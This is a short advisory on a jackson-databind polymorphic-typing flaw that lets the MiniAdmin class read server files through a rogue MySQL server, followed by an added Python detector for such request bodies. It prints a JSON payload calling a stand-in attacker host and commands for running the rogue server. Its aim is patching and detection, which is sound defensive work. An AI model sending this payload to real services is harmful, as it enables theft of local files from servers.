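When Default Typing is enabled and a mysql-connector-java version below 8.0.15 (released 2019.2.1) is on the classpath, an attacker can read arbitrary files by sending malicious JSON data. The mysql-connector-java library is the MySQL JDBC driver commonly used to connect to databases.
The CVE description reads: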
A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.x before 2.9.9. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint, the service has the mysql-connector-java jar (8.0.14 or earlier) in the classpath, and an attacker can host a crafted MySQL server reachable by the victim, an attacker can send a crafted JSON message that allows them to read arbitrary local files on the server. This occurs because of missing com.mysql.cj.jdbc.admin.MiniAdmin validation.
Vulnerability details:
The constructor of com.mysql.cj.jdbc.admin.MiniAdmin accepts a string value that represents a jdbcURL, and on initialization the com.mysql.cj.jdbc.admin.MiniAdmin class connects to the MySQL database specified in that jdbcURL.
python rogue_mysql_server.py
tail -f mysql.log
["com.mysql.cj.jdbc.admin.MiniAdmin","jdbc:mysql://attacker_server:port/foo"]
Upgrade jackson to 2.9.9 or later.
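For hosts that cannot be upgraded immediately, request bodies can be screened for the type-wrapper array shown in the payload above. The following is an added example, not code from the original page or from the jackson project; the function names, the JSON-path output format and the sample bodies (with the placeholder host db.example.test) are assumptions made for illustration.

```python
import json
from urllib.parse import urlsplit

# Class name taken from the page. Matching on it is a denylist check, so it
# complements the upgrade to 2.9.9 and does not replace it.
GADGET_CLASS = "com.mysql.cj.jdbc.admin.MiniAdmin"


def jdbc_target(value):
    """Extract host:port from a jdbc:mysql:// URL, or None if it is not one."""
    if not isinstance(value, str) or not value.startswith("jdbc:mysql://"):
        return None
    return urlsplit(value[len("jdbc:"):]).netloc or None


def find_miniadmin_payloads(body):
    """Return (json_path, jdbc_target) for every ["<class>", <value>] array
    in a JSON request body whose class name is MiniAdmin."""
    try:
        doc = json.loads(body)
    except (TypeError, ValueError):
        return []  # not JSON, so there is nothing to deserialize
    hits = []

    def walk(node, path):
        if isinstance(node, list):
            # Type-wrapper form from the page: ["<class name>", <value>]
            if len(node) == 2 and node[0] == GADGET_CLASS:
                hits.append((path, jdbc_target(node[1])))
            for i, child in enumerate(node):
                walk(child, f"{path}[{i}]")
        elif isinstance(node, dict):
            for key, child in node.items():
                walk(child, f"{path}.{key}")

    walk(doc, "$")
    return hits


# Constructed sample request bodies (db.example.test is a placeholder host).
SAMPLES = [
    '{"name": "alice", "tags": ["a", "b"]}',
    '{"obj": ["com.mysql.cj.jdbc.admin.MiniAdmin", "jdbc:mysql://db.example.test:3306/foo"]}',
    '[{"items": [["com.mysql.cj.jdbc.admin.MiniAdmin", 42]]}]',
    'not json',
]

if __name__ == "__main__":
    for body in SAMPLES:
        print(find_miniadmin_payloads(body))
```

The returned host:port is the MySQL server the JDBC URL points at, which can be correlated with outbound connection logs from the application host.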